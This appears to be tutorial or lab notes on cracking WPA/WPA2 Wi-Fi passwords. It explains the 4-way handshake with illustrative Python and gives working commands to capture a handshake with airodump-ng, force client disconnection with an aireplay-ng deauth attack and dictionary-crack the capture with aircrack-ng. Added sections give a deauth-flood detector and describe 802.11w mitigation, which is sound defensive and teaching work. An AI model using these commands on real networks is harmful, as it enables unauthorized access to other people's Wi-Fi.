WPA/WPA2 Cracking

The 4-way handshake

  • Router sends a challenge: The router (or access point) sends a "challenge" to the client, asking it to prove it knows the network's password without directly sharing it.
  • Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
  • Router verifies and sends confirmation: If the router sees the client’s response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
  • Final check and connection established: The client verifies the router's response, and if everything matches, they finish setting up the secure connection.
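The steps above in working code, as an added example that is not part of the original notes: the passphrase and SSID become a PMK (PBKDF2-HMAC-SHA1, 4096 iterations), the PMK plus both MAC addresses and both nonces become a PTK, and the first 16 bytes of the PTK (the KCK) produce the MIC that the router checks on message 2. The SSID, passphrase, nonces and client MAC are constructed sample values; the BSSID is the one used in the notes. Only the PMK derivation is checked against a published vector (the IEEE 802.11i Annex H "password"/"IEEE" test case); everything else is the handshake logic written out so the "verify" step is visible.

```python
import hashlib
import hmac

# Added example (not from the original notes): the WPA2-PSK key derivation
# behind the 4-way handshake, and the MIC check the router performs.
# MAC addresses, nonces, SSID and passphrases below are constructed sample values.

AP_MAC = bytes.fromhex("020000000000")      # BSSID from the notes
CLIENT_MAC = bytes.fromhex("020000000100")  # constructed
SSID = "ExampleNet"                         # constructed
ANONCE = bytes(range(32))                   # constructed; real nonces are random
SNONCE = bytes(range(32, 64))               # constructed
MIC_OFFSET = 81   # EAPOL header (4) + key-descriptor fields before the MIC (77)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Done by both sides from the shared secret: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """The PTK binds the PMK to both MACs and both nonces; its first 16 bytes are the KCK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed, first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(kck: bytes, snonce: bytes) -> bytes:
    """Client -> router: EAPOL-Key message 2 carrying SNonce and a MIC (field layout per 802.11i)."""
    body = (
        b"\x02"            # descriptor type: RSN
        + b"\x01\x0a"      # key info: pairwise, MIC present (constructed value)
        + b"\x00\x00"      # key length
        + b"\x00" * 8      # replay counter
        + snonce           # key nonce (32 bytes)
        + b"\x00" * 16     # key IV
        + b"\x00" * 8      # key RSC
        + b"\x00" * 8      # key ID
        + b"\x00" * 16     # MIC placeholder, filled in below
        + b"\x00\x00"      # key data length
    )
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = Key
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def router_verifies(frame: bytes, pmk: bytes) -> bool:
    """'Router verifies': read SNonce from the frame, rebuild the PTK from the router's own PMK,
    and accept only if the recomputed MIC matches. The passphrase itself never goes over the air."""
    snonce = frame[4 + 13 : 4 + 13 + 32]   # nonce field starts 13 bytes into the key descriptor
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def run_handshake(client_passphrase: str, router_passphrase: str) -> bool:
    """Client answers the ANonce challenge using its passphrase; router checks with its own."""
    client_ptk = derive_ptk(derive_pmk(client_passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    msg2 = build_message2(client_ptk[:16], SNONCE)
    return router_verifies(msg2, derive_pmk(router_passphrase, SSID))


if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print("matching passphrase accepted:", run_handshake("correct horse", "correct horse"))
    print("wrong passphrase accepted:   ", run_handshake("correct horse", "Correct horse"))
```

Everything `router_verifies` needs (both MACs, both nonces, the MIC'd frame) is visible in a captured handshake; the only thing it adds is its own PMK. That is why the capture alone is enough to test passphrase guesses offline, and why a long, random passphrase is the one thing a PSK network can rely on: each guess costs 4096 PBKDF2 rounds, but nothing stops an attacker from paying that cost.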

Preparation

  1. iw dev — this will show any wireless devices and their configuration.
  2. sudo iw dev wlan2 scan — this will scan nearby wifi networks
  3. sudo ip link set dev wlan2 down — turns device off
  4. sudo iw dev wlan2 set type monitor — Changes wlan2 to monitor mode
  5. sudo ip link set dev wlan2 up — turns device back on

Capturing handshake

  1. sudo airodump-ng wlan2 — start capturing WPA handshakes
  2. Cancel the scan once you locate the target network.
  3. sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2 — use the channel (-c) and BSSID (--bssid) from your scan. The output file is what is later used to crack the password.

Launching a Deauth attack

  1. sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
    • -0 indicates the deauth attack
    • 1 value is the number of deauths to send
    • -a indicates the BSSID
    • -c indicates the MAC address of the client to deauthenticate
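From the defender's side, the attack above leaves an obvious trace: a burst of deauthentication frames against one BSSID in a fraction of a second, where legitimate disconnects are rare and isolated. The following added example (not from the original notes) is the kind of rate check a wireless IDS runs over captured management frames; the frame records are constructed sample data, with the flood aimed at the BSSID used in the notes.

```python
from collections import defaultdict, deque

# Added example (not from the original notes): a simple deauth-flood detector
# over 802.11 management frame records. All frame data below is constructed.

DEAUTH = 12      # 802.11 management subtype: Deauthentication
DISASSOC = 10    # 802.11 management subtype: Disassociation
BEACON = 8       # 802.11 management subtype: Beacon


def detect_deauth_bursts(frames, window=1.0, threshold=8):
    """frames: iterable of (timestamp_seconds, mgmt_subtype, bssid).
    Returns one alert per BSSID the first time `threshold` deauth/disassoc frames
    fall inside a sliding `window` of seconds."""
    recent = defaultdict(deque)   # per-BSSID timestamps of deauth/disassoc frames
    alerts = []
    flagged = set()
    for ts, subtype, bssid in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:    # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in flagged:
            flagged.add(bssid)
            alerts.append({"bssid": bssid, "first_seen": q[0], "frames_in_window": len(q)})
    return alerts


def sample_frames():
    """Constructed capture: a healthy network (beacons plus one client leaving)
    and a flood of 64 deauth frames in under 0.2 s against 02:00:00:00:00:00."""
    healthy = [(10.0 + i, BEACON, "aa:bb:cc:dd:ee:ff") for i in range(5)]
    healthy.append((12.5, DEAUTH, "aa:bb:cc:dd:ee:ff"))    # a single legitimate deauth
    flood = [(20.0 + i * 0.003, DEAUTH, "02:00:00:00:00:00") for i in range(64)]
    return healthy + flood


if __name__ == "__main__":
    for a in detect_deauth_bursts(sample_frames()):
        print(f"ALERT: deauth flood on {a['bssid']} starting t={a['first_seen']:.3f}s "
              f"({a['frames_in_window']} frames within 1 s)")
```

Detection only tells you it happened. The mitigation is Protected Management Frames (802.11w), which WPA3 requires and most WPA2 access points can enable: deauthentication and disassociation frames are then authenticated, so forged ones from a third party are rejected by the client rather than acted on.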

Cracking WPA/WPA2 password

  1. sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
    • -a 2 — forces the attack mode; 2 selects WPA/WPA2-PSK (1 would be static WEP)
    • -b indicates the BSSID of the access point
    • -w indicates the dictionary list to use for the attack